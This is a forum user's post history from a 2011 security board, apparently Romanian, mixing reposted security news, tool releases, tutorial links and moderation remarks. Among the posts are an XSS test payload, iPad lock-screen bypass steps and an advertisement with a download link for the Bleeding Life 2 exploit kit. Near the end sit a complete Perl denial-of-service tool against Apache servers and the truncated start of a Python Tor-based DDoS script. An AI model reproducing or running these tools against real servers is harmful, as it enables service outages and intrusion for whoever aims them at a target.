Everything posted by Nytro

  1. ASLR Added to Android 4.0
     by Dennis Fisher, October 24, 2011, 8:36AM

     The newest version of the Android mobile operating system includes a major security upgrade, the presence of address space layout randomization (ASLR), which gives users some better protection against memory-corruption exploits. The inclusion of ASLR in Android 4.0, also known as "Ice Cream Sandwich", brings the security model of the operating system up a notch in relation to previous versions.

     Security researchers have criticized Android for its security shortcomings and have said that the security model offered by Apple's iOS is more beneficial for users. The iPhone operating system has included ASLR and data execution protection (DEP) for some time now, and iOS also includes a sandbox to help prevent attackers from moving among various applications once they've compromised a device.

     ASLR is designed to help prevent certain kinds of attacks by making it more difficult for attackers to know which components will be in which memory locations. The technology randomly arranges the positions of various components of a process, which makes it harder for attacks such as buffer overflows and other memory-corruption techniques to succeed. Both ASLR and DEP have been key technologies in desktop operating systems such as Windows Vista and Windows 7 to help prevent common attack techniques.

     In addition to the inclusion of ASLR, Android 4.0 also has improved management of user credentials. "Android 4.0 makes it easier for applications to manage authentication and secure sessions. A new keychain API and underlying encrypted storage let applications store and retrieve private keys and their corresponding certificate chains. Any application can use the keychain API to install and store user certificates and CAs securely," the Android 4.0 developer notes say.

     The new mobile OS also includes an enhanced API for VPNs. "Developers can now build or extend their own VPN solutions on the platform using a new VPN API and underlying secure credential storage. With user permission, applications can configure addresses and routing rules, process outgoing and incoming packets, and establish secure tunnels to a remote server. Enterprises can also take advantage of a standard VPN client built into the platform that provides access to L2TP and IPSec protocols," the notes say.

     Source: ASLR Added to Android 4.0 | threatpost
  2. Yes, I'm a communist when it comes to this kind of crap. I haven't commented on any technical topics, I haven't closed any of them, I haven't banned anyone there. I hand out bans here, to people like you, who have no business being here, who hope to sell betting tickets rather than work in IT.
  3. I'm fed up with discussions about betting, Serban Huidu, the census or other such garbage. RST is not the right place for that, not even in Offtopic. Of course, if I look at your posts, you have just one "interesting" post in Tutoriale romana: "what a crap tutorial. I'm still shocked that you put a virus scan on an html file )))", one in Prezentari, and the rest are here, in Offtopic. Basically, according to Nytro's laws, you are surplus here (for now). PS: This kind of discussion will be restricted. If you don't like it, there's OTV.
  4. Assembly Language Megaprimer for Linux

     Description: In this video series, we will learn the basics of Assembly Language programming on Linux. This will help us in doing reverse engineering and writing exploits in later videos. I will start from absolute scratch, so no prerequisites are required.

     - Assembly Primer For Hackers (Part 1) System Organization
     - Assembly Primer For Hackers (Part 2) Virtual Memory Organization
     - Assembly Primer For Hackers (Part 3) Gdb Usage Primer
     - Assembly Primer For Hackers (Part 4) Hello World
     - Assembly Primer For Hackers (Part 5) Data Types
     - Assembly Primer For Hackers (Part 6) Moving Data
     - Assembly Primer For Hackers (Part 7) Working With Strings
     - Assembly Primer For Hackers (Part 8) Unconditional Branching
     - Assembly Primer For Hackers (Part 9) Conditional Branching
     - Assembly Primer For Hackers (Part 10) Functions
     - Assembly Primer For Hackers (Part 11) Functions Stack

     Videos: http://www.securitytube.net/groups?operation=view&groupId=5
  5. Windows Assembly Language Megaprimer

     Description: In this video series, we will learn how to write assembly code for Windows. We will be using the knowledge we gained in the Assembly Language Megaprimer for Linux.

     - Windows Assembly Language Primer Part 1 (Processor Modes)
     - Windows Assembly Language Primer For Hackers Part 2 (Protected Mode Assembly)
     - Windows Assembly Language Primer For Hackers Part 3 (Win32 Asm Using Masm32)
     - Windows Assembly Language Primer For Hackers Part 4 (Masm Data Types)
     - Windows Assembly Language Primer For Hackers Part 5 (Procedures)
     - Windows Assembly Language Primer For Hackers Part 6 (Macros)
     - Windows Assembly Language Primer For Hackers Part 7 (Program Control Using Jmp)
     - Windows Assembly Language Primer For Hackers Part 8 (Decision Directives)
     - Windows Assembly Language Primer For Hackers Part 9 (Loops)

     Videos: http://www.securitytube.net/groups?operation=view&groupId=6
  6. Exploit Research Megaprimer

     Description: In this video series, we will learn how to program exploits for various vulnerabilities published online. We will also look at how to use various tools and techniques to find Zero Day vulnerabilities in both open and closed source software.

     - Exploit Research Megaprimer Part 1 Topic Introduction By Vivek
     - Exploit Research Megaprimer Part 2 Memcpy Buffer Overflow
     - Exploit Research Megaprimer Part 3 Strcpy Buffer Overflow
     - Exploit Research Megaprimer Part 4 Minishare Buffer Overflow
     - Exploit Research Megaprimer Part 5 Freesshd Buffer Overflow
     - Exploit Research Megaprimer Part 6 Seh Basics
     - Exploit Research Megaprimer Part 7 Overwrite Seh
     - Exploit Research Megaprimer Part 8 Exploiting Seh
     - Exploit Research Megaprimer Part 9 Guest Lecture By Andrew King - Binary Diffing Microsoft Patches

     Videos: http://www.securitytube.net/groups?operation=view&groupId=7
  7. We're closing the topic; this place is meant for people passionate about IT security, so discuss betting somewhere else. Edit: if you wrote software for that kind of thing, that's a different matter.
  8. Secure Your Wordpress | Tool Explained Wpscan

     Description: WordPress is one of the most popular CMSs among all its open source competitors. WordPress has a very simple and open framework. It is the most desirable choice of any hacker to start learning hacking with it. Today we will look at a tool called wpscan. This tool is a vulnerability scanner for any WordPress installation. It will let you know the following things:

     1. Version of the WordPress
     2. Known list of information disclosure files (ex. Readme.html)
     3. WordPress usernames
     4. WordPress Plugin names
     5. Bruteforce for password (Password list needs to be generated)

     Video: http://www.securitytube.net/video/2367
  9. Look at how the link looks, it needs some small changes... E.g.: Download Security_and_Hacking_Anti_Hacker_Tool_Kit_Second_Edition.chm for free on Filesonic.com
  10. xSQLScanner 1.2 and Mono Version

      From: Rodrigo Matuck <rodrigomatuck () globo com>
      Date: Sun, 23 Oct 2011 21:47:25 -0200

      Hi everyone,

      I published at my blog a new tool called xSQLScanner. This program allows the user to audit MS-SQL and My-SQL servers.

      Some features: 1 - 6 Vulnerability Audit options; 1.2 - Test for weak password fast; 1.3 - Test for wear/user passwords; 1.4 - Wordlist option; 1.5 5 - Userlist option; 2 - Portscanner 7 - Range IP Address audit and more.

      Now the good news: I made 2 versions, Windows & Linux. The Linux version uses the Mono Project, so I compiled a Mono version to run under Linux (BackTrack 5 - GNOME).

      Here are the instructions to install under Linux:

      1 - get xsqlscan-mono.tgz - 4shared.com - online file sharing and storage - download
      2 - tar -xzvf xsqlscan.tar.gz
      3 - cd xsqlscan
      4 - ./xsqlscanw
      5 - The program will verify if you have the Mono Core files. If you already have them, the application will launch.
      5.1 - Answer 'yes' to download the libs and Mono core files
      6 - Restart the application by typing: ./xsqlscanw
      7 - Enjoy.

      The link for the Windows version: xsqlscanner-1.2.zip - 4shared.com - online file sharing and storage - download

      Remember: for any bugs or suggestions, please contact me.

      Regards

      Source: Penetration Testing: xSQLScanner 1.2 and Mono Version
  11. Owned and exposed - Nr. 3

      [ASCII-art banner: "owned and exposed", issue no. 3, brought to you by your Happy Ninjas. Featuring: Intro, The Happy Ninja Faker, St0re.cc, Swissfaking.net, El-Basar.biz, Vpn24.org, Undercover.su, Secure-Host.in, k!LLu's Botnet, Unique-Crew.net, Zion-Network.net, Some leftovers, Hackbase.cc, Outro]

      First of all, here is the verification of the sha1 hash we published when hba-crew got owned: 49bd4433fff1b04530dcaff1f52fa971ff895871 = sha1(HAPPY_NINJAS_ARE_STAYING_HAPPY_exp03)

      ========={ Intro }=========

      Tonight's the night. And it's going to happen, again and again. It has to happen.

      We all want to welcome you to a brand new issue of Owned and exp0sed! Before we get to the fun part, we'd just like to clarify some things since there has been a lot going on on the internet since our last issue. Movements, as they put it, like Anonymous or the short-lived phenomenon of Lulzsec have become an increasingly important topic to media and the public. We want to line out our motivation in contrast to theirs.

      Anonymous has tried to gain as much media attention as possible by inflicting the most damage possible on big companies and service providers. Similarly, Lulzsec have attacked various websites and published an enormous amount of information. However, while it's their goal to put up pressure on governments and big organizations, it's ours to protect the public from the abysses of the internet. Fraud is our main concern and we intend to contain it as much as possible.

      While Anon and Lulzsec toss out their stuff within weeks, we take our time to gain access, collect data and aggregate it nicely for you, our readers. This is why there is a substantial time span between our releases. We of course also monitor the German and international fraud scene as it recovers from our attacks; it's hard to stop something that is driven by selfishness, greed and money.

      We also find it worrying that Anonymous and especially Lulzsec act in what they call "Operation Antisec". The original Antisec Movement was brought to life by actual hackers and targeted full disclosure and the corporate security industry. Publishing gigantic amounts of (corporate) data on the internet does exactly the opposite: It provides the security industry with the attention they need and hence new customers.

      But let's now look at why we are here today. "Money is the root of all evil" as the proverb has it; and it's why fraud communities do come back after we have owned and exposed them; but as long as they carry on, we do, too. Fraudsters ought to know that they're not safe because we are going to hunt down every single site that is left.

      We experience the fraud scene scattering wider and wider after every issue we have published; new boards, and with them new admins, emerge out of nowhere. That just shows well again how stubborn fraudsters are as most of them still refuse to accept that they lost their right to exist on the internet. It's particularly frustrating that they don't seem to draw lessons from getting owned again and again. That being said we can just strongly advise you to spend your time on something worthwhile. It's not too late ...

      Download: http://blog.yakuza112.org/wp-content/uploads/2011/10/exp03.txt
  12. Agnitio Security Code Review Tool v2.1 released

      OCTOBER 24, 2011 | WRITTEN BY SECURITY NINJA

      Hi everyone,

      I wanted to write a blog post today to let you all know that I've released Agnitio v2.1 today. I did plan to release this version a few weeks ago but a combination of life and bugs/last minute feature changes delayed the release, better late than never though!

      I’ve made a lot of changes for this release so I wanted to make extra sure that everything worked before I released it. Interestingly Agnitio passed all of its QA tests in the first test run but the Data Migration Tool was a different story! The DMT is used to migrate users' existing data into the new Agnitio checklist database. It’s probably not the best way to perform an upgrade and it certainly needs some work but for now it works!

      Agnitio currently puts the new checklist database into the program files directory alongside the other Agnitio files which can cause a bit of a problem because of the default file permissions on the Program Files directory. The program files directory in Windows 7 has better (the definition of better requires me to look at it as a security professional and not as someone writing code!) default permissions/restrictions than previous versions of Windows I believe, which causes a problem when using Agnitio or the DMT as a standard user. The user obviously needs to be able to read data from the checklist database and of course write reviews or changes to the database.

      I tried a few different approaches to rectifying this and I’ve settled on a solution which probably isn’t ideal but it does mean standard users can use Agnitio on Windows 7. The DMT will need to be run as an administrator to migrate the data but after that administrator privileges aren’t needed anymore. You will need to make a few permission changes regardless of the operating system you are using so please make sure you read the Agnitio v2.1 User Guide (included as part of the installation) before you attempt to use the new version or migrate your data. I’m currently working on a better solution to this with a new contributor so I’d expect to have a nicer solution to this problem when the next version of Agnitio is released!

      So what’s new in v2.1? I have listed all of the changes in this release below:

      - Windows x64 support (thanks to Steven van der Baan).
      - Decompile Android .apk files so you can analyse the source code and AndroidManifest.xml file. This uses tools like JAD so you will need to have Java installed on your machine to decompile the Android .apk files.
      - C# and Java rules from the OWASP Code Crawler tool imported into the Agnitio database and linked to the relevant checklist questions.
      - New checklist items for mobile application security code reviews. These checklist items were created to address items in the OWASP top 10 mobile risks project that weren’t covered by existing checklist items.
      - Application profiles can now be configured as either “Web” or “Mobile”. This will determine which checklist items from the database are used to create the checklist for the application being reviewed.
      - Create new checklist items. You will be able to configure the relevant principle of secure development for the new checklist item as well as deciding whether this is a question for “Web”, “Mobile” or “Both” types of applications.
      - Modify existing checklist items. This was supposed to be included in v2.0 but a last minute change I made at 7am in a Las Vegas hotel room broke this functionality. You can now modify the text, the principle and type columns for questions in the checklist database.

      I made a lot of small changes in addition to the ones above; I’ve listed some of the more obvious ones below:

      - Only one answer allowed per checklist item (thanks to Steven van der Baan).
      - Fixed a bug on the security code review tab where checklist items with no answers are highlighted in red and never “un-highlighted” (thanks to Steven van der Baan).
      - Added a language checkbox for Objective-C on the profile creation and view profile tabs.
      - Checklists are now sorted by principle and not by the question number.

      I did have two issues which I couldn’t get fixed but I decided to release v2.1 now because it has already taken longer than I’d planned! The two issues will only affect x64 users and I will make sure they are fixed as part of v2.2:

      - Android .apk decompile functionality will fail to decompile .apk files on Windows x64.
      - Data Migration Tool (for upgrades from v2.0) is not supported on x64 at the moment. You can use the Data Migration Tool on x86 versions of Windows to migrate your v2.0 data.

      I think I’ve included all of the new features and changes in this blog post so all that’s left for me to do now is give you the link to download v2.1: Agnitio v2.1

      I have started to plan what will be included in v2.2 but I’ve not started working on it yet. I have a few cool ideas in mind for v2.2 which I think you will all like. I’ve released 5 versions of Agnitio over the past 11 months which has eaten up a lot of my spare time and I don’t really enjoy working on one thing for a long time. I will be taking a couple of weeks away from the project before I start work on v2.2 to rest my poor overworked brain. I don’t expect to release v2.2 until sometime after Christmas, partly because of the break I’m taking from the project but mainly because of the amount of work that I will need to do to implement the cool changes I want to make!

      As always I’d love to hear what you think of the latest version of Agnitio so get in touch via Twitter, email or leave a comment on this blog post.

      SN

      Download: https://sourceforge.net/projects/agnitiotool/files/v2.1/
      Source: https://www.securityninja.co.uk/application-security/agnitio-security-code-review-tool-v2-1-released/
  13. Aidsql: Sql Injection Penetration Testing Tool

      Description: This is a video showing you how to effectively audit your website with aidsql.

      Download aidSQL: aidSQL: A Tools to Find Vulnerable Spots in Website - Insecure Stuff
      Video: http://www.securitytube.net/video/2370
  14. Nytro

    Fun stuff

  15. Python Programming Tutorials

      Here is all of my Python Programming high quality tutorials!

      Playlist by thenewboston (duration, views):

      - Python Programming Tutorial - 1 - Installing Python (3:19, 293,520 views)
      - Python Programming Tutorial - 2 - Numbers and Math (5:40, 192,181 views)
      - Python Programming Tutorial - 3 - Variables (6:25, 152,139 views)
      - Python Programming Tutorial - 4 - Modules and Functions (7:08, 154,537 views)
      - Python Programming Tutorial - 5 - How to Save Your P... (8:25, 122,680 views)
      - Python Programming Tutorial - 6 - Strings (6:23, 104,006 views)
      - Python Programming Tutorial - 7 - More on Strings (5:28, 86,868 views)
      - Python Programming Tutorial - 8 - Raw Input (2:56, 89,108 views)
      - Python Programming Tutorial - 9 - Sequences and Lists (5:04, 82,545 views)
      - Python Programming Tutorial - 10 - Slicing (7:43, 82,488 views)
      - Python Programming Tutorial - 11 - Editing Sequences (6:43, 72,190 views)
      - Python Programming Tutorial - 12 - More List Functions (6:28, 68,699 views)
      - Python Programming Tutorial - 13 - Slicing Lists (4:58, 55,699 views)
      - Python Programming Tutorial - 14 - Intro to Methods (6:02, 60,803 views)
      - Python Programming Tutorial - 15 - More Methods (4:15, 54,476 views)
      - Python Programming Tutorial - 16 - Sort and Tuples (3:57, 49,275 views)
      - Python Programming Tutorial - 17 - Strings n Stuff (6:18, 47,952 views)
      - Python Programming Tutorial - 18 - Cool String Methods (5:31, 50,276 views)
      - Python Programming Tutorial - 19 - Dictionary (6:13, 54,215 views)
      - Python Programming Tutorial - 20 - If Statement (5:50, 57,107 views)
      - Python Programming Tutorial - 21 - else and elif (5:05, 45,434 views)
      - Python Programming Tutorial - 22 - Nesting Statements (4:17, 41,405 views)
      - Python Programming Tutorial - 23 - Comparison Operators (4:33, 38,245 views)
      - Python Programming Tutorial - 24 - And and Or (6:15, 36,982 views)
      - Python Programming Tutorial - 25 - For and While Loops (5:37, 51,979 views)
      - Python Programming Tutorial - 26 - Infinite Loops an... (5:45, 42,562 views)
      - Python Programming Tutorial - 27 - Building Functions (5:20, 47,205 views)
      - Python Programming Tutorial - 28 - Default Parameters (4:04, 35,939 views)
      - Python Programming Tutorial - 29 - Multiple Parameters (5:08, 34,582 views)
      - Python Programming Tutorial - 30 - Parameter Types (6:10, 34,451 views)
      - Python Programming Tutorial - 31 - Tuples as Parameters (4:22, 29,344 views)
      - Python Programming Tutorial - 32 - Object Oriented P... (7:10, 63,602 views)
      - Python Programming Tutorial - 33 - Classes and Self (7:48, 54,274 views)
      - Python Programming Tutorial - 34 - Subclasses Superc... (4:12, 36,963 views)
      - Python Programming Tutorial - 35 - Overwrite Variabl... (3:16, 29,873 views)
      - Python Programming Tutorial - 36 - Multiple Parent C... (3:46, 28,343 views)
      - Python Programming Tutorial - 37 - Constructors (4:17, 30,597 views)
      - Python Programming Tutorial - 38 - Import Modules (6:51, 36,160 views)
      - Python Programming Tutorial - 39 - reload Modules (4:21, 25,267 views)
      - Python Programming Tutorial - 40 - Getting Module Info (5:21, 28,038 views)
      - Python Programming Tutorial - 41 - Working with Files (6:28, 38,421 views)
      - Python Programming Tutorial - 42 - Reading and Writing (5:23, 35,579 views)
      - Python Programming Tutorial - 43 - Writing Lines (6:11, 50,767 views)

      Youtube: http://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
  16. All About Python and Unicode

      March 4, 2007 - 3:39pm - frank

      Contents:

      - A Starting Point
      - Unicode Text in Python
      - Converting Unicode symbols to Python literals
      - Why doesn't "print" work?
      - Codecs
      - From Unicode to binary
      - From binary to Unicode
      - String Operations
      - A wrinkle in \U
      - Bugs in Python 2.0 & 2.1
      - Python as a "universal recoder"
      - Now the Fun Begins ...
      - Unicode and the Real World
      - Unicode Filenames
      - Microsoft Windows
      - Unix/POSIX/Linux
      - Mac OS/X
      - Unicode and HTML
      - Unicode and XML
      - Unicode and network shares (Samba)
      - Summary

      Article: http://boodebr.org/main/python/all-about-python-and-unicode
  17. iPad 2 iOS 5 Lock Screen Bypass Vulnerability + Video

      Marc Gurman at 9to5Mac has discovered a vulnerability on the iPad that allows for a limited bypass of the device's lockscreen. Anyone with an iPad Smart Cover can gain access to the previously-open app (or the home screen if no app was open). By holding the power button to bring up the ‘Power Off’ screen, closing the smart cover, re-opening it, and clicking cancel, the attacker will be dropped into the screen that was open before the iPad was locked.

      If the attacker gets dropped into the home screen, then they'll be able to see the installed apps, but won't be able to open anything. If Safari or Mail (or any other app) was open when the device was locked, then the attacker would have access to that app.

      From a locked iPad 2:

      1) Lock a password protected iPad 2
      2) Hold down power button until iPad 2 reaches turn off slider
      3) Close Smart Cover
      4) Open Smart Cover
      5) Click cancel on the bottom of the screen

      Video: http://www.youtube.com/watch?v=NLgQ22naQhE

      This isn’t the first security issue Apple has experienced since rolling out iOS 5. On the brand new iPhone 4S it has been discovered you can use Siri when a device is locked. Even if a passcode is required, Siri doesn’t care and allows you to carry out functions such as sending email and text messages.

      Protection Against the iPad 2 Lock Screen Bypass: For the time being, iPad 2 users are encouraged to disable the "Smart Cover unlocking" feature found in Settings > General.

      Source: http://thehackernews.com/2011/10/ipad-2-ios-5-lock-screen-bypass.html
  18. Anonymous Hackers Take Down 40 Child Porn Websites

      Anonymous has taken down more than 40 darknet-based child porn websites over the last week. Details of some of the hacks have been released via pastebin #OpDarknet, including personal details of 1500 users of a site named 'Lolita City,' and DDoS tools that target Hidden Wiki and Freedom Hosting - alleged to be two of the biggest darknet sites hosting child porn.

      News of the Anonymous campaign to actively target anyone hosting child porn sites comes from statements associated with Anonymous on Pastebin and two Anonymous YouTube video channels. AnonNews has yet to issue a press release. The AnonMessage and BecomeAnonymous YouTube channels both posted videos with statements of intent to hunt, skin and kill pedobears everywhere, starting with Freedom Hosting.

      Source: http://thehackernews.com/2011/10/anonymous-hackers-take-down-40-child.html
  19. OpenVAS - Advanced Open Source vulnerability scanner

      OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. The powerful and comprehensive OpenVAS solution is available as Free Software and maintained on a daily basis.

      An overview of the vulnerability handling process is:

      - The reporter reports the vulnerability privately to OpenVAS.
      - The appropriate component's developers work privately with the reporter to resolve the vulnerability.
      - A new release of the OpenVAS component concerned is made that includes the fix.

      The OpenVAS Manager is the central service that consolidates plain vulnerability scanning into a full vulnerability management solution. The Manager controls the Scanner via OTP (OpenVAS Transfer Protocol) and itself offers the XML-based, stateless OpenVAS Management Protocol (OMP). All intelligence is implemented in the Manager so that it is possible to implement various lean clients that will behave consistently, e.g. with regard to filtering or sorting scan results. The Manager also controls a SQL database (sqlite-based) where all configuration and scan result data is centrally stored.

      Download: http://www.openvas.org/download.html
      Source: OpenVAS - Advanced Open Source vulnerability scanner ~ THN : The Hacker News
  20. XSS Vulnerability in Interactive YouTube API Demo Beta

      There is a critical cross-site scripting (XSS) vulnerability in Interactive YouTube API Demo Beta, discovered by various sources. One of the white hat hackers, "Vansh Sharma", informed us about this XSS vulnerability with a proof of concept.

      Proof Of Concept:

      - Open YouTube Data API - Demo Beta
      - Enter script <img src="<img src=search"/onerror=alert("xss")//"> in the keyword area.
      - Press ADD

      Source: XSS Vulnerability in Interactive YouTube API Demo Beta ~ THN : The Hacker News
  21. Bleeding Life 2 Exploit Pack Released

      Black Hat Academy releases Bleeding Life 2 exploit pack. This is an exploit pack that affects Windows-based web browsers via Adobe and Java. You can read all about it, and download it for yourself. Statistics are kept based on exploit, browser, and OS version.

      Exploits

      [+] Adobe
      - CVE-2008-2992
      - CVE-2010-1297
      - CVE-2010-2884
      - CVE-2010-0188

      [+] Java
      - CVE-2010-0842
      - CVE-2010-3552
      - Signed Applet

      Features

      - Advanced Statistical Information
      - Stylish Progress Bars
      - Full User-Friendly Admin Panel
      - Referer Stats
      - Secure Panel - Login/Logout
      - Ability To Set and Save Passwords On Panel
      - Ability To Allow Guest Access - Guest Can Only View Stats Page, Clicking and Other Pages Disabled.
      - Ability To Add and/or Remove Exploits Used
      - Ability To Add Scan4You Credentials For Built-In Scanner Use
      - Ability To Filter Browsers
      - Ability To Filter Operating Systems
      - Attempt To Detect and Filter HTTP Proxies
      - Ability To Blacklist by IP/Range
      - Ability To Import Blacklist On Panel
      - Built In Scanner
      - Ability To Upload Payload From Panel
      - Payload Statistical Information - MD5, Size, SHA1
      - Ability To Generate iFrame On Panel / Encrypted
      - Ability To Domain Check/Scan On Panel

      Download: http://www.blackhatacademy.org/releases/bleeding-life-2-download.tgz
      Source: http://thehackernews.com/2011/10/bleeding-life-2-exploit-pack-released.html
  22. Apache Server Denial of Service exploit (DDOS) #!/usr/bin/perl -w # Exploit Title: Apache Server Denial of Service exploit (DDOS) # Date: 22/10/2011 # Author: Xen0n # Software Link: http://www.apache.org/dyn/closer.cgi # Version: 2.3.14 and older # Tested on: CentOs #feel free to contact us xenon.sec@gmail.com use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors print <<EOTEXT; ooooooo ooooo .oooo. `8888 d8' d8P'`Y8b Y888..8P .ooooo. ooo. .oo. 888 888 ooo. .oo. `8888' d88' `88b `888P"Y88b 888 888 `888P"Y88b .8PY888. 888ooo888 888 888 888 888 888 888 d8' `888b 888 .o 888 888 `88b d88' 888 888 o888o o88888o `Y8bod8P' o888o o888o `Y8bd8P' o888o o888o Welcome to Xen0n Apache Attacker EOTEXT my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections ); my ( $cache, $xenon, $method, $ssl, $rand, $tcpto ); my $result = GetOptions('shost=s' => \$shost,'dns=s' => \$host,'xenon' => \$xenon,'num=i' => \$connections,'cache' => \$cache,'port=i' => \$port,'https' => \$ssl,'tcpto=i' => \$tcpto,'test' => \$test,'timeout=i' => \$timeout,'version' => \$version,); if ($version) { print "Version 1.0\n"; exit; } unless ($host) { print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n"; print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n"; print "\n\temail: xenon.sec@ gmail.com\n"; print "\n"; exit; } unless ($port) { $port = 80; print "Defaulting to port 80.\n"; } unless ($tcpto) { $tcpto = 5; print "Defaulting to a 5 second tcp connection timeout.\n"; } unless ($test) { unless ($timeout) { $timeout = 100; print "Defaulting to a 100 second re-try timeout.\n"; } unless ($connections) { $connections = 1000; print "Defaulting to 1000 connections.\n"; } } my $usemultithreading = 0; if ( $Config{usethreads} ) { print "Multithreading enabled.\n"; $usemultithreading = 1; use threads; use threads::shared; } else { print "No multithreading 
capabilites found!\n"; print "Xen0n will be slower than normal as a result.\n"; } my $packetcount : shared = 0; my $failed : shared = 0; my $connectioncount : shared = 0; srand() if ($cache); if ($shost) { $sendhost = $shost; } else { $sendhost = $host; } if ($xenon) { $method = "POST"; } else { $method = "GET"; } if ($test) { my @times = ( "1", "30", "90", "240", "500" ); my $totaltime = 0; foreach (@times) { $totaltime = $totaltime + $_; } $totaltime = $totaltime / 60; print "Testing $host could take up to $totaltime minutes.\n"; my $delay = 0; my $working = 0; my $sock; if ($ssl) { if ( $sock = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } else { if ( $sock = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } if ($working) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "GET /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; if ( print $sock $primarypayload ) { print "Connection successful, now just wait...\n"; } else { print "That's odd - I connected but couldn't send the data to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } } else { print "Uhm... I can't connect to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } for ( my $i = 0 ; $i <= $#times ; $i++ ) { print "Trying a $times[$i] second delay: \n"; sleep( $times[$i] ); if ( print $sock "X-a: b\r\n" ) { print "\tWorked.\n"; $delay = $times[$i]; } else { if ( $SIG{__WARN__} ) { $delay = $times[ $i - 1 ]; last; } print "\tFailed after $times[$i] seconds.\n"; } } if ( print $sock "Connection: Close\r\n\r\n" ) { print "Okay that's enough time. 
Xen0n closed the socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } else { print "Remote server closed socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } if ( $delay < 166 ) { print <<EOSUCKS2BU; Since the timeout ended up being so small ($delay seconds) and it generally takes between 200-500 threads for most servers and assuming any latency at all... you might have trouble using Xen0n against this target. You can tweak the -tcpto flag down to 1 second but it still may not build the sockets in time. EOSUCKS2BU } } else { print "Attacking $host:$port every $timeout seconds with $connections sockets:\n"; if ($usemultithreading) { domultithreading($connections); } else { doconnections( $connections, $usemultithreading ); } } sub doconnections { my ( $num, $usemultithreading ) = @_; my ( @first, @sock, @working ); my $failedconnections = 0; $working[$_] = 0 foreach ( 1 .. $num ); #initializing $first[$_] = 0 foreach ( 1 .. $num ); #initializing while (1) { $failedconnections = 0; print "\t\tBuilding sockets.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 0 ) { if ($ssl) { if ( $sock[$z] = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; } else { $working[$z] = 0; } } else { if ( $sock[$z] = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK } else { $working[$z] = 0; } } if ( $working[$z] == 1 ) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "$method /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . 
"Content-Length: 42\r\n"; my $handle = $sock[$z]; if ($handle) { print $handle "$primarypayload"; if ( $SIG{__WARN__} ) { $working[$z] = 0; close $handle; $failed++; $failedconnections++; } else { $packetcount++; $working[$z] = 1; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } } print "\t\tSending data.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 1 ) { if ( $sock[$z] ) { my $handle = $sock[$z]; if ( print $handle "X-a: b\r\n" ) { $working[$z] = 1; $packetcount++; } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } } print "Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n"; sleep($timeout); } } sub domultithreading { my ($num) = @_; my @thrs; my $i = 0; my $connectionsperthread = 50; while ( $i < $num ) { $thrs[$i] = threads->create( \&doconnections, $connectionsperthread, 1 ); $i += $connectionsperthread; } my @threadslist = threads->list(); while ( $#threadslist > 0 ) { $failed = 0; } } __END__ Sursa: Apache HTTP server Denial of service venerability
  23. Pedo Gun - PEW PEW - Anonymous DDOSer #!/usr/bin/python # this assumes you have the socks.py (http://phiral.net/socks.py) # and terminal.py (http://phiral.net/terminal.py). DDoS used to take out Hidden Wiki and # Freedom Hosting sites. Based of Tor Hammer by entropy. Uses SLLLLLLOOOOW HEADERS # Chris H. [redacted to avoid copyright issues] attack import os import re import time import sys import random import math import getopt import socks import string import terminal from threading import Thread global stop_now global term stop_now = False term = terminal.TerminalController() useragents = [ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)", "Opera/9.20 (Windows NT 6.0; U; en)", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20061205 Iceweasel/ (Debian-", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)", "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0", "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20101209 Firefox/3.6.13", "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; 